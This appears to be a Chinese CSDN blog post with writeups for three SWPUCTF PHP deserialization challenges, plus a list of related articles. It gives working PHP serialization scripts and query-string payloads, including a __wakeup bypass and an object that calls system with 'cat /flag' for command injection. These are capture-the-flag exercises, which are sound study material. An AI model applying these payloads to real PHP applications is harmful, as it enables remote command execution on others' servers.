SWPUCTF

最新推荐文章于 2024-10-15 19:13:35 发布
最新推荐文章于 2024-10-15 19:13:35 发布
阅读量922 收藏 16
点赞数 15
文章标签: android android studio ide
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80217595/article/details/136136316
版权

[SWPUCTF 2022 新生赛]ez_ez_unserialize

创造类x,定义了一个魔术常量x为_FILE_(当前文件名),又定义了几个函数,construct函数让x类中的x赋值,wakeup让x重新赋值为_FULE_,destruct函数高亮x常量,如果传参x存在反序列化,否则输出

flag在fllllllag.php

还要绕过__wakeup函数,把成员数改为大于实际数量

<?php
class X
{
    public $x = 'fllllllag.php';
}
$a=new X;
echo serialize($a);
?>

O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}

改为?x=O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}

[SWPUCTF 2022 新生赛]1z_unserialize

$a = $this->lt;

$a($this->lly);

这是这一题的注入点只要传参把$a变成system();$this->lly变成ls或者cat就是一个简单的命令注入了

构造

<?php
 
class lyh{
    public $url = 'NSSCTF.com';
    public $lt;
    public $lly;
}
$a = new lyh();
$a->lt='system';
$a->lly='ls /';
echo serialize($a);
 
?> 

nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";} 

[SWPUCTF 2021 新生赛]ez_unserialize

用御剑扫描

flag.php打不开

但在robots.txt找到了

打开后得到

构造

<?php
class wllm{
    public $admin;
    public $passwd;
    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }
 
        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}
   
$w=new wllm();
$w->admin="admin";
$w->passwd="ctf";
$w=serialize($w);
echo $w;

得到 O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";} 

题目中提示要以get方式给p传参,并且会对传入参数进行反序列化操作

因此我们将序列化后的内容传给p即可

构造

?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

东郭野人
关注
[SWPUCTF 2021 新生赛]crypto(1~9)详细解题思路集外代软件安装,拓展安装,库函数安装
符啸九天的博客
09-05 566
[SWPUCTF 2021 新生赛]crypto6 [SWPUCTF 2021 新生赛]crypto7 [SWPUCTF 2021 新生赛]crypto8 [SWPUCTF 2021 新生赛]ez_caesar解题思路
[SWPUCTF 2021 新生赛]sql - 联合注入
oZuoShen123的博客
10-07 810
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
SWPUCTF 2022新生赛 web部分wp
weixin_44770698的博客
01-16 4400
SWPUCTF 2022新生赛
[SWPUCTF 2022 新生赛]ez_ez_unserialize
wangzhemvp的博客
04-23 260
要绕过wakeup函数,只要序列化的中的成员数大于实际成员数。
[SWPUCTF 2022 新生赛]1z_unserialize
最新发布
2301_80871705的博客
10-15 390
输入payload:nss=O:3:"lyh":3:{s:3:"url";s:3:"lly";我们联想到命令执行函数,我们需要构造payload,如果能够把a换成system,lly换成cat,那么就可以进行命令注入。构造payload。得到flag:NSSCTF{934dfc44-3e21-47d8-b350-d0c932ffeab9}
[SWPUCTF 2022 新生赛]1z_unserialize和[SWPUCTF 2022 新生赛]ez_1zpo
m0_73700261的博客
04-26 1003
得到以下payload=O:3:"lyh":3:{s:3:"url";s:3:"lly";以及这里有个wakeup的绕过,以及这里需要一个assert的函数不知道为啥要它,以及里边有一个md5的弱比较,绕过这三个就能够正常的命令执行了。[SWPUCTF 2022 新生赛]1z_unserialize。接着在另外给自己传参一个参数,在这个参数里做命令执行。[SWPUCTF 2022 新生赛]ez_1zpo。这个题目是一题很标准的反序列化,在根目录下边找到flag的文件。这个是构造的pop链。
第三周培训任务
stronelu的博客
02-11 344
如果想单独定义搜索引擎的漫游器访问子目录时的行为,那么可以将自定的设置合并到根目录下的robots.txt,或者使用robots元数据(Metadata,又称元数据)之后我们看到这段代码中使用了_wakeup函数,我们要将其绕过.依据_weakup函数的绕过方法,我们将fllllllag.php。此时,我们只需要让$a=system,也就是lt=system,lly不论输入什么指令都可以。根据题目的描述,我们最后将POST上传的nss反序化即可得到flag.以此来实现绕过的效果。
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
【NSSCTF】刷题记录——[SWPUCTF 2021 新生赛]系列(REVERSE篇)
jameshuangchuan的博客
08-10 2787
str.zfill(width)根据width长度对str进行切片,那么此题中的注释可以看出,result。真的麻,年轻时没有好好学习,后果就是一把年纪重新捡起这些玩意看到程序就头皮发麻……hex()用于将10进制整数转换成16进制,以字符串形式表示。ord()用来返回对应字符的ascii码。此处主要在NSSCTF平台(
【NSSCTF】刷题记录——[SWPUCTF 2021 新生赛]系列(WEB篇)
jameshuangchuan的博客
08-08 3209
此处主要在NSSCTF平台()上开展刷题。
[SWPUCTF 2022 新生赛]部分web
2301_80470992的博客
02-13 1028
分析题目这段 PHP 代码定义了一个名为lyh的类,并在其中定义了一些属性和方法。然后,它使用函数来反序列化从 POST 请求中接收到的数据,并最后使用函数高亮显示当前文件的源代码。类定义 (lyh$url$lt$lly$this->lt$a$a$this->lly代码执行流程lyh__destruct$lt$lly这个题目是一题很标准的反序列化构造链条得到以下payload=O:3:"lyh":3:{s:3:"url";s:2:"lt";s:3:"lly";s:2:"ls";
PHP反序列化部分题目解析
LS_Sy的博客
02-17 543
稍加分析,我们可以知道在实现nss反序列化的同时,会触发__destruct()的魔术方法将lt的值赋给a,然后调用a中存储的函数,并将lly属性的值作为参数传递给该函数,由此我们想到把a变成system();this->lly变成ls就可以了。
[SWPUCTF 2021 新生赛] ez_unserialize
Welcome To Myon'Blog !
07-05 2488
链尾(就是最终我们想要利用的地方),在echo $flag 并且include了flag.php 往上看,发现只需要满足 再往上看,发现执行这条语句我们需要触发__destruct()函数 __destruct是析构函数,会在对象的所有引用被删除或者当对象被显式销毁时自动执行,比如new完一个对象,当创建完成之后就不引用了,如果有赋值指向就会立马丢弃,触发destruct函数。 这里还有一个__construct()构造函数,它是在实例化一个对象(即new时)会自动调用。
关于序列化与反序列化解题(2)
2302_79119987的博客
06-05 983
分析发现定义一个类,里面为两个对象赋值并调用//检查$this->fun是否等于 "show_me_flag",如果是,则调用hint()函数。当对象的方法不存在时,__call()方法会被调用,:这里将$val[0]赋值给$this->fun。输出$this->fun并返回空格字符串。定义了一个__invoke方法,这是一种魔术方法,它允许对象以函数方式调用。在这个方法中,首先调用checkcheck函数检查,然后使用eval执行的内容。分别定义了两个类和其中的属性,__wakeup()
NSSCTF ez_unserialize
m0_49257076的博客
11-02 1178
打开题目是胡桃摇的表情包(手动滑稽????),下面是“题目在哪” 这边是上手直接使用蚁剑扫描得到的robots.txt文件,然后打开之后有cl45s.php文件,访问之后可以看到题目的源码 观察源码就知道是一个简单的unserialize,手写一下(菜狗枯了) <?php class wllm{ public $admin; public $passwd; public function __construct(){ $this->admin ...
DACTFEzunserialize
ro4lsc的博客
05-07 7520
DACTFEzunserialize(PHP反序列化字符逃逸) 这个题是我在赛后再进行学习的,所以自己在本地复现了一下环境。 <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function r...
ez_unserialize 编程学习
ByteCodN的博客
09-12 71
总结而言,ez_unserialize 函数是一个在 PHP 中反序列化序列化数据的有用工具。通过熟练掌握 ez_unserialize 函数的使用方法,您可以更好地处理序列化数据,并在需要时将其还原为可用的 PHP 数据。在编程中,ez_unserialize 是一个常用的函数,用于将序列化的数据转换回原始的 PHP 数据结构。在上面的示例中,我们序列化了一个包含一个名为 “foo” 的对象和一个包含两个元素的数组的数据结构。函数,我们将该字符串转换回原始的 PHP 对象和数组,并将结果存储在变量。
[SWPUCTF 2018]SimplePHP
07-28
根据提供的信息,这个问题可能是关于SWPUCTF 2018比赛中的一个题目,题目名称为"SimplePHP"。然而,由于提供的引用内容不完整,无法给出更具体的答案。如果您有关于这个问题的更多信息,请提供更多的上下文,以便我...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值